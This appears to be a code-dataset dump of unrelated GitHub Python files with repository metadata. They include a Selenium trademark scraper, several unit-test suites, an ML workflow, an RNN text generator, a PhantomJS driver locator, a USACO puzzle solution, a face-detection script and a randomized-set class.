browser.execute_script('window.scrollTo(0,document.body.scrollHeight);')\n time.sleep(random.random())\n print(f'len:{len(ls)}')\n for item in ls:\n print(item.text)\n\n serial_number = item.find_element_by_xpath('.//td[1]').text.strip()\n print(f'serial_number:{serial_number}')\n lssue_number = item.find_element_by_xpath('.//td[2]/a').text.strip()\n print(f'lssue_number:{lssue_number}')\n announcement_date = item.find_element_by_xpath('.//td[3]').text.strip()\n print(f'announcement_date:{announcement_date}')\n # registration_number, applicant, trade_name\n registration_number = item.find_element_by_xpath('.//td[5]').text.strip()\n print(f'registration_number:{registration_number}')\n applicant = item.find_element_by_xpath('.//td[6]').text.strip()\n print(f'applicant:{applicant}')\n trade_name = item.find_element_by_xpath('.//td[7]').text.strip()\n print(f'trade_name:{trade_name}')\n print('=' * 99)\n # 翻页\n if page <= total:\n page += 1\n browser.execute_script('window.scrollTo(0,document.body.scrollHeight-500);')\n btn_next = browser.find_element_by_xpath('//*[@id=\"pages\"]/table/tbody/tr/td[8]/a')\n\n print('next page ...')\n # 移动鼠标去点击下一页\n # ActionChains(browser).move_to_element(next_page_btn).click().perform()\n btn_next.click()\n time.sleep(3)\n else:\n break\n\n time.sleep(random.random())\n\nexcept Exception as e:\n print(e)\nfinally:\n browser.quit()\n","repo_name":"1987617587/lsh_py","sub_path":"pachong/PCdemo1/day08/刘士豪20200401/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"4272776565","text":"import io\nimport os\nimport unittest\nfrom unittest import mock\n\nfrom opentrons.robot import Robot\n\nfrom server import helpers\n\n\nclass MiscHelpersTestCase(unittest.TestCase):\n def setUp(self):\n Robot.reset_for_tests()\n self.robot = Robot.get_instance()\n self.robot.connect()\n\n def test_convert_bytes_stream_to_str(self):\n text = ['line 1', 'line 2', 'foo bar']\n bytes_stream = io.BytesIO()\n [bytes_stream.write(i.encode()) for i in text]\n bytes_stream.seek(0)\n text_res = helpers.convert_byte_stream_to_str(bytes_stream)\n self.assertEqual(''.join(text), text_res)\n\n def test_get_upload_proof_robot(self):\n methods = [\n 
'connect',\n 'disconnect',\n 'move_head',\n 'move_plunger',\n 'reset',\n 'run',\n 'simulate'\n ]\n\n real_list = [getattr(self.robot, i) for i in methods]\n [setattr(self.robot, i, mock.Mock()) for i in methods]\n mock_list = [getattr(self.robot, i) for i in methods]\n\n patched_robot, restore = helpers.get_upload_proof_robot(self.robot)\n\n # Call all methods after patching\n [getattr(patched_robot, i)(patched_robot) for i in methods]\n\n # Assert none of the real methods were called after patching\n [self.assertFalse(i.called) for i in mock_list]\n\n robot = restore()\n [getattr(robot, i)(patched_robot) for i in methods]\n\n [self.assertTrue(i.called) for i in mock_list]\n\n # Restore real methods\n [setattr(self.robot, i, real_list.pop(0)) for i in methods]\n\n\nclass LoadJSONTestCase(unittest.TestCase):\n def setUp(self):\n Robot.reset_for_tests()\n self.robot = Robot.get_instance()\n self.robot.connect()\n\n def get_json_protocol_stream(self, name):\n return open(\n os.path.join(os.path.dirname(__file__), '..', 'data', name),\n 'rb'\n )\n\n def get_good_json_protocol_stream(self):\n return self.get_json_protocol_stream('good_json_protocol.json')\n\n def get_bad_json_protocol_stream(self):\n return self.get_json_protocol_stream('bad_json_protocol.json')\n\n def get_invalid_json_protocol_stream(self):\n return self.get_json_protocol_stream('invalid_json_protocol.json')\n\n def test_load_json_with_good_protocol(self):\n stream = self.get_good_json_protocol_stream()\n api_resp_result = helpers.load_json(stream)\n api_resp_expected = {'errors': [], 'warnings': []}\n self.assertDictEqual(api_resp_expected, api_resp_result)\n\n def test_load_json_with_bad_protocol(self):\n stream = self.get_bad_json_protocol_stream()\n api_resp_result = helpers.load_json(stream)\n self.assertEqual(len(api_resp_result['errors']), 2)\n self.assertEqual(len(api_resp_result['warnings']), 0)\n\n def test_load_json_with_invalid_protocol(self):\n stream = self.get_invalid_json_protocol_stream()\n api_resp_result = helpers.load_json(stream)\n self.assertEqual(len(api_resp_result['errors']), 1)\n self.assertEqual(\n api_resp_result['errors'][0], 'Cannot parse invalid JSON'\n )\n","repo_name":"cristhiand3/opentrons-app","sub_path":"server/tests/helpers/test_helpers.py","file_name":"test_helpers.py","file_ext":"py","file_size_in_byte":3194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"111526683","text":"#!/usr/bin/env python\n#file test_make_otu_table\n\n__author__ = \"Rob Knight\"\n__copyright__ = \"Copyright 2010, The QIIME Project\" #consider project name\n__credits__ = [\"Rob Knight\", \"Justin Kuczynski\"] #remember to add yourself\n__license__ = \"GPL\"\n__version__ = \"1.1.0\"\n__maintainer__ = \"Rob Knight\"\n__email__ = \"rob@spot.colorado.edu\"\n__status__ = \"Release\"\n\nfrom cogent.util.unit_test import TestCase, main\nfrom qiime.make_otu_table import (libs_from_seqids,\n seqids_from_otu_to_seqid, make_otu_map)\n\nclass TopLevelTests(TestCase):\n \"\"\"Tests of top-level functions\"\"\"\n def test_libs_from_seqids(self):\n \"\"\"libs_from_seqids should identify correct libs\"\"\"\n seqids = ['ABC_001', 'DEF_002', 'ABC_003', 'GHI_JKL_001']\n self.assertEqual(libs_from_seqids(seqids),\n set(['ABC', 'DEF', 'GHI_JKL']))\n\n def test_seqids_from_otu_to_seqid(self):\n \"\"\"seqids_from_otu_to_seqid should return right seqids\"\"\"\n otu_to_seqid ={'0':['ABC_0','DEF_1'],'x':['GHI_2']}\n self.assertEqual(seqids_from_otu_to_seqid(otu_to_seqid),\n 
set(['ABC_0', 'DEF_1', 'GHI_2']))\n\n def test_make_otu_map_no_taxonomy(self):\n \"\"\"make_otu_map should work without supplied taxonomy\"\"\"\n otu_to_seqid ={ '0':['ABC_0','DEF_1'],\n '1':['ABC_1'],\n 'x':['GHI_2', 'GHI_3','GHI_77'],\n 'z':['DEF_3','XYZ_1']\n }\n obs = make_otu_map(otu_to_seqid)\n exp = \"\"\"#Full OTU Counts\n#OTU ID\\tABC\\tDEF\\tGHI\\tXYZ\n0\\t1\\t1\\t0\\t0\n1\\t1\\t0\\t0\\t0\nx\\t0\\t0\\t3\\t0\nz\\t0\\t1\\t0\\t1\"\"\"\n self.assertEqual(obs, exp)\n\n def test_make_otu_map_taxonomy(self):\n \"\"\"make_otu_map should work with supplied taxonomy\"\"\"\n otu_to_seqid ={ '0':['ABC_0','DEF_1'],\n '1':['ABC_1'],\n 'x':['GHI_2', 'GHI_3','GHI_77'],\n 'z':['DEF_3','XYZ_1']\n }\n taxonomy = {'0':'Bacteria;Firmicutes', 'x':'Bacteria;Bacteroidetes'}\n obs = make_otu_map(otu_to_seqid, taxonomy)\n exp = \"\"\"#Full OTU Counts\n#OTU ID\\tABC\\tDEF\\tGHI\\tXYZ\\tConsensus Lineage\n0\\t1\\t1\\t0\\t0\\tBacteria;Firmicutes\n1\\t1\\t0\\t0\\t0\\tNone\nx\\t0\\t0\\t3\\t0\\tBacteria;Bacteroidetes\nz\\t0\\t1\\t0\\t1\\tNone\"\"\"\n self.assertEqual(obs, exp)\n\n\nif __name__ =='__main__':\n main()\n","repo_name":"clovr/clovr-base","sub_path":"hudson/hudson-scripts/qiime/test_make_otu_table.py","file_name":"test_make_otu_table.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"8199851073","text":"import pandas as pd\n\nfrom sklearn.metrics import mean_squared_error\nfrom datetime import timedelta\n\nimport xgboost as xgb\n\nfrom prefect import flow, task\nfrom prefect.task_runners import SequentialTaskRunner\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.tree import DecisionTreeClassifier\n\nimport xgboost as xgb\n\n\n@task\ndef load_data(path):\n data = pd.read_csv(path)\n data['ever_married'] = [0 if i != 'Yes' else 1 for i in data['ever_married']]\n data['gender'] = [0 if i != 'Female' else 1 for i in data['gender']]\n data = pd.get_dummies(\n data, columns=['work_type', 'Residence_type', 'smoking_status'])\n return data\n\n\n@task(retries=3)\ndef generate_datasets(df):\n X = df.drop(['stroke'], axis=1)\n y = df['stroke']\n X_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=0.30, random_state=42)\n return X_train, X_test, y_train, y_test\n\n\n@task\ndef train_model(X_train, X_test, y_train, y_test):\n best_params = {\n \"criterion\": 'gini',\n \"max_depth\": None,\n \"min_samples_split\": 2,\n \"min_samples_leaf\": 1,\n \"min_weight_fraction_leaf\": 0,\n \"max_features\": None,\n \"random_state\": None,\n \"max_leaf_nodes\": None,\n \"min_impurity_decrease\": 0,\n \"class_weight\": None,\n \"ccp_alpha\": 0\n }\n\n clf_gini = DecisionTreeClassifier(**best_params)\n clf_gini.fit(X_train, y_train)\n return clf_gini\n\n\n@task\ndef estimate_quality(model, X_test, y_test):\n y_pred_gini = model.predict(X_test)\n return mean_squared_error(y_test, y_pred_gini, squared=False)\n\n\n@flow(task_runner=SequentialTaskRunner())\ndef nyc_duration_flow():\n df = load_data('data/full_data.csv')\n X_train, X_val, y_train, y_val = generate_datasets(\n df).result()\n model = train_model(X_train, X_val, y_train, y_val)\n rmse = estimate_quality(model, X_val, y_val)\n\n\nnyc_duration_flow()\n","repo_name":"aaoeclipse/m13-ml-industrial-final","sub_path":"duration_workflow.py","file_name":"duration_workflow.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} 
+{"seq_id":"35416125133","text":"# Reference: https://github.com/rdcolema/word-level-rnn-for-text-generation/blob/master/word_gen.py\n\nimport random\n\nimport numpy as np\nfrom keras.layers.core import Dense, Dropout\nfrom keras.layers.recurrent import LSTM\nfrom keras.models import Sequential, model_from_json\n\nfrom download_review_data import get_artifact_app_id\nfrom export_review_data import get_output_file_name\n\n\ndef get_model_architecture_file_name():\n return 'word_level_rnn_model_architecture.h5'\n\n\ndef get_model_weights_file_name():\n return 'word_level_rnn_model_weights.h5'\n\n\ndef sample(a, temperature=1.0):\n # helper function to sample an index from a probability array\n a = np.log(a) / temperature\n a = np.exp(a) / np.sum(np.exp(a))\n if sum(a) > 1.0: # occasionally getting 1.00000X, so handling for that\n a *= 0.999\n return np.argmax(np.random.multinomial(1, a, 1))\n\n\ndef train(path, maxlen=30):\n \"\"\"trains the LSTM model on text corpora\"\"\"\n\n try:\n text = open(path).read().lower()\n except UnicodeDecodeError:\n import codecs\n\n text = codecs.open(path, encoding='utf-8').read().lower()\n\n print(f'corpus length: {len(text)}')\n\n chars = set(text)\n words = set(text.split())\n\n print(f\"total number of unique words: {len(words)}\")\n print(f\"total number of unique chars: {len(chars)}\")\n\n word_indices = {c: i for i, c in enumerate(words)}\n indices_word = {i: c for i, c in enumerate(words)}\n\n step = 3\n\n print(f\"maxlen: {maxlen} ; step: {step}\")\n\n sentences = []\n next_words = []\n list_words = text.lower().split()\n\n for i in range(0, len(list_words) - maxlen, step):\n sentences2 = ' '.join(list_words[i : i + maxlen])\n sentences.append(sentences2)\n next_words.append(list_words[i + maxlen])\n\n print(f'length of sentence list: {len(sentences)}')\n print(f\"length of next_word list: {len(next_words)}\")\n\n print('Vectorization...')\n X = np.zeros((len(sentences), maxlen, len(words)), dtype=np.bool)\n y = np.zeros((len(sentences), len(words)), dtype=np.bool)\n for i, sentence in enumerate(sentences):\n for t, word in enumerate(sentence.split()):\n X[i, t, word_indices[word]] = 1\n y[i, word_indices[next_words[i]]] = 1\n\n # build the model: 2 stacked LSTM\n\n print('Building model...')\n\n model = Sequential()\n model.add(LSTM(512, return_sequences=True, input_shape=(maxlen, len(words))))\n model.add(Dropout(0.5))\n model.add(LSTM(512, return_sequences=False))\n model.add(Dropout(0.5))\n model.add(Dense(len(words), activation='softmax'))\n\n model.compile(loss='categorical_crossentropy', optimizer='adam')\n\n try:\n model.load_weights(get_model_weights_file_name())\n except Exception as e:\n print(e)\n pass\n\n # train the model, output generated text after each iteration\n\n for iteration in range(1, 750):\n print(f'Iteration {iteration}')\n\n model.fit(X, y, batch_size=500, nb_epoch=3)\n json_string = model.to_json()\n with open(get_model_architecture_file_name(), 'w') as f:\n f.write(json_string)\n model.save_weights(get_model_weights_file_name(), overwrite=True)\n\n return model\n\n\ndef generate_from_word_level_rnn(\n path,\n maxlen=30,\n diversity=1.0,\n min_sent_len=10,\n max_sent_len=65,\n):\n with open(path, encoding='utf-8') as f:\n text = f.read().lower().split()[:4940]\n words = set(text)\n start_index = random.randint(0, len(text) - maxlen - 1)\n word_indices = {c: i for i, c in enumerate(words)}\n indices_word = {i: c for i, c in enumerate(words)}\n\n response = \"\"\n model = model_from_json(open(path).read())\n 
model.load_weights(get_model_weights_file_name())\n model.compile(loss='categorical_crossentropy', optimizer='rmsprop')\n sentence = text[start_index : start_index + maxlen]\n\n for _i in range(random.randint(min_sent_len, max_sent_len)):\n x = np.zeros((1, maxlen, len(words)))\n for t, word in enumerate(sentence):\n x[0, t, word_indices[word]] = 1.0\n preds = model.predict(x, verbose=0)[0]\n next_index = sample(preds, diversity)\n next_word = indices_word[next_index]\n if not response:\n response += f' {next_word}'\n else:\n if response.split()[-1] != next_word:\n response += f' {next_word}'\n del sentence[0]\n sentence.append(next_word)\n return response\n\n\ndef load_model():\n model = model_from_json(open(get_model_architecture_file_name()).read())\n model.load_weights(get_model_weights_file_name())\n model.compile(loss='categorical_crossentropy', optimizer='rmsprop')\n\n return model\n\n\nif __name__ == \"__main__\":\n app_id = get_artifact_app_id()\n text_file_name = get_output_file_name(app_id)\n model = train(path=text_file_name)\n response = generate_from_word_level_rnn(path=text_file_name)\n","repo_name":"woctezuma/sample-steam-reviews","sub_path":"word_level_rnn.py","file_name":"word_level_rnn.py","file_ext":"py","file_size_in_byte":4912,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"38946992237","text":"from __future__ import annotations\n\nimport json\nimport re\nfrom typing import Any, Generator\n\nfrom pyderman.util import downloader\nfrom pyderman.util.const import LINUX, MAC_ARM\n\n\ndef get_url(\n version: str = \"latest\", _os: str | None = None, _os_bit: str | None = None\n) -> tuple[str, str, str]:\n beta = True\n pattern = version\n bit = \"\"\n if not version or version == \"latest\":\n beta = False\n pattern = \"\"\n if _os == MAC_ARM:\n _os = \"mac\"\n if _os == LINUX:\n bit = \"64\" if _os_bit == \"64\" else \"i686\"\n for release in _releases():\n name = str(release[\"name\"]).lower()\n if not beta and \"beta\" in name:\n continue\n if _os is not None and _os in name and pattern in name and bit in name:\n ver = re.search(r\"(\\d{1,2}\\.\\d{1,2}\\.\\d{1,2})\", name)\n if ver is not None:\n return (\n \"phantomjs.*/bin/phantomjs\",\n release[\"links\"][\"self\"][\"href\"],\n str(ver.group(1)),\n )\n raise ValueError(f\"Unable to locate PhantomJSDriver version! [{version}]\")\n\n\ndef _releases() -> Generator[dict[str, Any], None, None]:\n page = \"https://api.bitbucket.org/2.0/repositories/ariya/phantomjs/downloads/\"\n while page:\n s = downloader.raw(page)\n if s is None:\n raise ValueError(f\"Unable to get page: {page}\")\n else:\n data = json.loads(s)\n for release in data[\"values\"]:\n yield release\n page = data[\"next\"] if \"next\" in data else None\n\n\nif __name__ == \"__main__\":\n print(get_url(\"latest\", \"win\", \"64\"))\n","repo_name":"shadowmoose/pyderman","sub_path":"pyderman/drivers/phantomjs.py","file_name":"phantomjs.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"77"} +{"seq_id":"12027465478","text":"# FALL 2021\n# SI 206\n\nfrom bs4 import BeautifulSoup\nimport requests\nimport re\nimport os\nimport json\nimport csv\nimport sqlite3\nimport plotly.graph_objects as go\n\ndef setUpDatabase(db_name):\n \"\"\"\n Takes in the name of the database, a string, as the input. 
Returns the cursor and connection to the database.\n \"\"\"\n path = os.path.dirname(os.path.abspath(__file__))\n conn = sqlite3.connect(path+'/'+db_name)\n cur = conn.cursor()\n return cur, conn\n\n\ndef setUpSnowTable(file_name, curr, conn):\n \"\"\"\n Takes in the filename of the json file loaded from the API, the database cursor, and the database connections as inputs. Creates a table called\n Total_Snowfall and inserts the county_id and total snowfall for that county. Returns nothing. \n \"\"\"\n\n\n snow_data = open(file_name, 'r')\n snow_data_dict = json.loads(snow_data.read())\n value_list = snow_data_dict.items()\n curr.execute(\"CREATE TABLE IF NOT EXISTS Total_Snowfall (county_id INTEGER, snow_inches INTEGER)\")\n for item in value_list:\n curr.execute(\"SELECT id FROM Counties WHERE county = ?\", (item[0],))\n county_id = curr.fetchone()[0]\n curr.execute(\"INSERT INTO Total_Snowfall (county_id, snow_inches) VALUES (?,?)\", (county_id, item[1]))\n conn.commit()\n snow_data.close()\n\ndef setUpTempTable(file_name, cur, conn):\n \"\"\"\n Takes in the filename of the json file loaded from the API, the database cursor, and the database connections as inputs. Creates a table called\n Avg_Temp and inserts the county_id and average temperature of that county. Returns nothing. \n \"\"\"\n\n temp_data = open(file_name, 'r')\n temp_data_dict = json.loads(temp_data.read())\n value_list = temp_data_dict.items()\n cur.execute(\"CREATE TABLE IF NOT EXISTS Avg_Temp (county_id INTEGER, temp_f INTEGER)\")\n for item in value_list:\n cur.execute(\"SELECT id FROM Counties WHERE county = ?\", (item[0],))\n county_id = cur.fetchone()[0]\n cur.execute(\"INSERT INTO Avg_Temp (county_id, temp_f) VALUES (?,?)\", (county_id, item[1]))\n conn.commit()\n temp_data.close()\n\n\ndef summary_for_scatterplot(cur, conn):\n \"\"\"\n Takes in the database cursor and the database connections as inputs. Joins four tables based off of the county id numbers and selects the county name,\n number of fatal car crashes, total snowfall, and average temperature. Returns a list of tuples of these selected values. \n \"\"\"\n\n cur.execute(\"\"\" SELECT DISTINCT Counties.county, Crashes.num_fatal_crashes, Total_Snowfall.snow_inches, Avg_Temp.temp_f\n FROM Counties INNER JOIN Crashes ON Counties.id = Crashes.county_id INNER JOIN Total_Snowfall ON \n Counties.id = Total_Snowfall.county_id INNER JOIN Avg_Temp on Counties.id = Avg_Temp.county_id\"\"\")\n results = cur.fetchall()\n return results\n\n\ndef visualization(lst_tups):\n \"\"\"\n Takes in a list of tuples with corresponding snowfall inches, fatal car crashes, average temperature, and county name\n for each Illinois county in alphabetical order as inputs and returns nothing. Creates a scatterplot where the snowfall\n is x-axis and fatalities is y-axis. 
Also creates a bar chart where the temperature is x-axis and fatalities is y-axis\n \"\"\"\n snowfall = []\n crashes = []\n temp = []\n name = []\n\n for t in lst_tups: \n snowfall.append(t[2])\n crashes.append(t[1])\n temp.append(t[3])\n name.append(t[0])\n\n\n\n\n\n title_str = \"Relationship between Total Snowfall and Car Crash Fatalities in Illinois in 2019\"\n title_str2 = \"Relationship between Average Temperature and Car Crash Fatalities in Illinois in 2019\"\n\n #barchart\n\n fig = go.Figure()\n\n fig.add_trace(go.Scatter(\n x=snowfall,\n y=crashes,\n hoverinfo = \"text\",\n hovertext=name,\n marker=dict(color=\"rgb(64, 60, 94)\", size=10),\n mode=\"markers\",\n name=\"Snowfall and Car Crash Fatalities\",\n ))\n\n fig.update_layout(title = title_str,\n xaxis_title=\"Total Snowfall (inches)\", yaxis_title=\"Fatal Car Crashes\")\n \n fig.show() \n\n\n\n #scatterplot\n\n fig2 = go.Figure([go.Bar(x=temp, y=crashes)])\n fig2.update_traces(marker_color=\"rgb(123, 164, 224)\", marker_line_color=\"rgb(12, 62, 133)\", marker_line_width=2, width=.05, hoverinfo = \"text\",\n hovertext=name)\n fig2.update_layout(title_text = title_str2, xaxis_title=\"Average Temperature (F)\", yaxis_title=\"Fatal Car Crashes\")\n fig2.show()\n\n\ndef write_calculations(filename, curr, conn):\n \"\"\"\n Takes in a filename (string), the database cursor, and the database connections as inputs. Creates a file, selects from database,\n and writes the total population, total amount of fatal car crashes, total snowfall (in), and average temperature in Illinois in \n 2019 to the file. Returns nothing. \n \"\"\"\n path = os.path.dirname(os.path.abspath(__file__)) + os.sep\n #Writes the results of the average_followers_per_song() function to a file.\n outFile = open(path + filename, \"w\")\n outFile.write(\"Total population, total amount of fatal car crashes, total snowfall (in), and average temperature in Illinois in 2019\\n\")\n outFile.write(\"=======================================================================\\n\\n\")\n\n\n curr.execute(\"SELECT population FROM Counties\")\n population = curr.fetchall()\n\n total_pop = 0\n for p in population:\n total_pop = total_pop + p[0]\n\n outFile.write(\"The total population in Illinois in 2019: \" + str(total_pop) + '\\n' + '\\n')\n\n\n curr.execute(\"SELECT num_fatal_crashes FROM Crashes\")\n crashes = curr.fetchall()\n\n total_crashes = 0\n for c in crashes:\n total_crashes = total_crashes + c[0]\n\n outFile.write(\"The total number of fatal crashes in Illinois in 2019: \" + str(total_crashes) + '\\n' + '\\n')\n\n\n curr.execute(\"SELECT snow_inches FROM Total_Snowfall\")\n snow = curr.fetchall()\n\n total_snowfall = 0\n for s in snow:\n total_snowfall = total_snowfall + s[0]\n\n outFile.write(\"The total amount of snowfall (inches) in Illinois in 2019: \" + str(total_snowfall) + '\\n' + '\\n')\n\n\n curr.execute(\"SELECT temp_f FROM Avg_Temp\")\n temps = curr.fetchall()\n\n total_temp = 0\n for t in temps:\n total_temp = total_temp + t[0]\n\n outFile.write(\"The average temperature (Fahrenheit) in Illinois in 2019: \" + str(total_temp/len(temps)) + '\\n' + '\\n')\n\ndef main():\n \"\"\"\n Takes no inputs and returns nothing. 
Creates tables and selects data from database in order to create visualaztions (2 graphs).\n \"\"\"\n\n\n curr, conn = setUpDatabase('Weather_Crash_Data_Illinois.db')\n setUpSnowTable(\"Snow_Data.json\", curr, conn)\n setUpTempTable(\"Temp_Data.json\", curr, conn)\n\n\n str_snow = \"Snow_Data_pt\"\n\n i = 2\n for count in range(4):\n count = 2 + count\n str_final = str_snow + str(count)+ \".json\"\n setUpSnowTable(str_final, curr, conn)\n\n str_temp = \"Temp_Data_pt\"\n j = 2\n for cont in range(4):\n cont = j + cont\n str_fin = str_temp + str(cont) + \".json\"\n setUpTempTable(str_fin, curr, conn)\n \n \n\n write_calculations(\"total-amounts.txt\", curr, conn)\n\n\n lst_tups = summary_for_scatterplot(curr, conn)\n visualization(lst_tups) \n\n\nif __name__ == '__main__':\n main()","repo_name":"juliareel/final-project-206","sub_path":"visualization2.py","file_name":"visualization2.py","file_ext":"py","file_size_in_byte":7318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31860916175","text":"\"\"\"\n ID: actuato2\n LANG: PYTHON3\n TASK: crypt1\n\"\"\"\ndef checkFit(Set, InsertList, PartorProd):\n Set = list(tuple(sorted(Set)))\n for i in Set:\n if i in InsertList:\n if PartorProd == 0 and len(Set) == 3:\n continue\n elif PartorProd == 1 and len(Set) == 4:\n continue\n else:\n return False\n else:\n return False\n return True\n\ndef getProduct(f1, f2):\n if type(f1) == list:\n f1 = int(''.join(map(str, f1)))\n if type(f2) == list:\n f2 = int(''.join(map(str, f2)))\n return [int(d) for d in str(f1*f2)]\n\n\n\nwith open(\"crypt1.in\") as fInput:\n lines = fInput.readlines()\n\nacceptedNums = sorted([int(i) for i in lines[1].strip().split()])\nfactor1 = []\nfactor2 = []\npartialProduct1 = []\npartialProduct2 = []\nproduct = []\nsolutions = 0\n\nfor m in acceptedNums:\n for y in acceptedNums:\n factor2 = [m, y]\n for i in acceptedNums:\n for e in acceptedNums:\n for x in acceptedNums:\n factor1 = [i,e,x]\n partialProduct1 = getProduct(factor1, factor2[0])\n partialProduct2 = getProduct(factor1, factor2[1])\n product = getProduct(factor1, factor2)\n if checkFit(partialProduct1, acceptedNums, 0) and checkFit(partialProduct2, acceptedNums, 0) and checkFit(product, acceptedNums, 1):\n solutions += 1\n print(str(factor1)+str(factor2)+str(partialProduct1)+str(partialProduct2)+str(product) )\n\nwith open(\"crypt1.out\", 'w') as fOutput:\n fOutput.write(str(solutions)+'\\n')","repo_name":"blackmagic919/USACO","sub_path":"training/Chapter_1/Section 1.3/crypt1/crypt1.py","file_name":"crypt1.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"234338631","text":"\"\"\"Test suite for parse_config function.\"\"\"\n\nfrom pathlib import Path\n\nfrom gatorgrade.input.checks import GatorGraderCheck\nfrom gatorgrade.input.checks import ShellCheck\nfrom gatorgrade.input.parse_config import parse_config\n\n\ndef test_parse_config_gg_check_in_file_context_contains_file():\n \"\"\"Test to make sure that the file context is included in the GatorGrader arguments.\"\"\"\n # Given a configuration file with a GatorGrader check within a file context\n config = Path(\"tests/input/yml_test_files/gatorgrade_one_gg_check_in_file.yml\")\n # When parse_config is run\n output = parse_config(config)\n # Then the file path should be in the GatorGrader arguments\n assert \"file.py\" in output[0].gg_args\n\n\ndef test_parse_config_check_gg_matchfilefragment():\n 
\"\"\"Test to make sure the description, check name, and options appear in the GatorGrader arguments.\"\"\"\n # Given a configuration file with a GatorGrader check\n config = Path(\"tests/input/yml_test_files/gatorgrade_matchfilefragment.yml\")\n # When parse_config is run\n output = parse_config(config)\n # Then the description, check name, and options appear in the GatorGrader arguments\n assert output[0].gg_args == [\n \"--description\",\n \"Complete all TODOs\",\n \"MatchFileFragment\",\n \"--fragment\",\n \"TODO\",\n \"--count\",\n \"0\",\n \"--exact\",\n \"--directory\",\n \"path/to\",\n \"--file\",\n \"file.py\",\n ]\n\n\ndef test_parse_config_gg_check_no_file_context_contains_no_file():\n \"\"\"Test to make sure checks without a file context do not have a file path in GatorGrader arguments.\"\"\"\n # Given a configuration file with a GatorGrader check without a file context\n config = Path(\n \"tests/input/yml_test_files/gatorgrade_one_gg_check_no_file_context.yml\"\n )\n # When parse_config is run\n output = parse_config(config)\n # Then the GatorGrader arguments do not contain a file path\n assert output[0].gg_args == [\n \"--description\",\n \"Have 8 commits\",\n \"CountCommits\",\n \"--count\",\n \"8\",\n ]\n\n\ndef test_parse_config_parses_both_shell_and_gg_checks():\n \"\"\"Test to make sure that both shell and GatorGrader checks are parsed.\"\"\"\n # Given a configuration file that contains a shell check and GatorGrader check\n config = Path(\"tests/input/yml_test_files/gatorgrader_both_checks.yml\")\n # When parse_config is run\n output = parse_config(config)\n # Then the output should contain a shell check and GatorGrader check\n assert isinstance(output[0], GatorGraderCheck)\n assert isinstance(output[1], ShellCheck)\n\n\ndef test_parse_config_yml_file_runs_setup_shell_checks():\n \"\"\"Test to make sure that a configuration file without setup commands can be parsed.\"\"\"\n # Given a configuration file without setup commands\n config = Path(\"tests/input/yml_test_files/gatorgrade_no_shell_setup_check.yml\")\n # When parse_config run\n output = parse_config(config)\n # Then the output should contain the GatorGrader check\n assert output[0].gg_args == [\n \"--description\",\n \"Have 8 commits\",\n \"CountCommits\",\n \"--count\",\n \"8\",\n ]\n\n\ndef test_parse_config_shell_check_contains_command():\n \"\"\"Test to make sure that the command for a shell check is stored.\"\"\"\n # Given a configuration file with a shell check\n config = Path(\"tests/input/yml_test_files/gatorgrade_one_shell_command_check.yml\")\n # When the parse_config is run\n output = parse_config(config)\n # Then the command should be stored in the shell check\n assert output[0].command == \"mdl .\"\n","repo_name":"GatorEducator/gatorgrade","sub_path":"tests/input/test_input_gg_checks.py","file_name":"test_input_gg_checks.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"77"} +{"seq_id":"73577313207","text":"import matplotlib.pyplot as plt\nimport mtcnn\nimport argparse\nimport sys\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"image_path\", help=\"The path to the image to use.\")\nparser.add_argument(\"show_image\", help=\"(True or False) Whether or not to display the image.\")\n\nargs = parser.parse_args()\n\nif __name__ == \"__main__\":\n\ttry:\n\t\timg = plt.imread(args.image_path)\n\texcept Exception as e:\n\t\tprint(\"\\t[-] Fatal Error: {}\".format(e))\n\t\tsys.argv(-1)\n\n\tmodel = 
mtcnn.MTCNN()\n\tfaces = model.detect_faces(img)\n\n\tplt.imshow(img)\n\n\tfor face in faces:\n\t\tconfidence = face['confidence']\n\n\t\tax = plt.gca()\n\n\t\tif confidence >= 0.8:\n\t\t\tx, y, width, height = face['box']\n\t\t\trect = plt.Rectangle((x, y), width * 1.1, height * 1.1, fill=False, color='red')\n\t\t\tax.add_patch(rect)\n\n\tplt.show()","repo_name":"jweir136/MTCNN-Test-1","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70491235770","text":"\n# Space: O(n)\n# Time: O(n)\n\nimport random\n\n\nclass RandomizedSet:\n\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.data = set()\n self.list = []\n self.length = 0\n\n def insert(self, val: int) -> bool:\n \"\"\"\n Inserts a value to the set. Returns true if the set did not already contain the specified element.\n \"\"\"\n\n if val not in self.data:\n self.data.add(val)\n self.list.append(val)\n self.length += 1\n return True\n return False\n\n def remove(self, val: int) -> bool:\n \"\"\"\n Removes a value from the set. Returns true if the set contained the specified element.\n \"\"\"\n if val in self.data:\n self.data.remove(val)\n self.list.remove(val)\n self.length -= 1\n return True\n return False\n\n def getRandom(self) -> int:\n \"\"\"\n Get a random element from the set.\n \"\"\"\n random_number = random.randint(0, self.length - 1)\n return 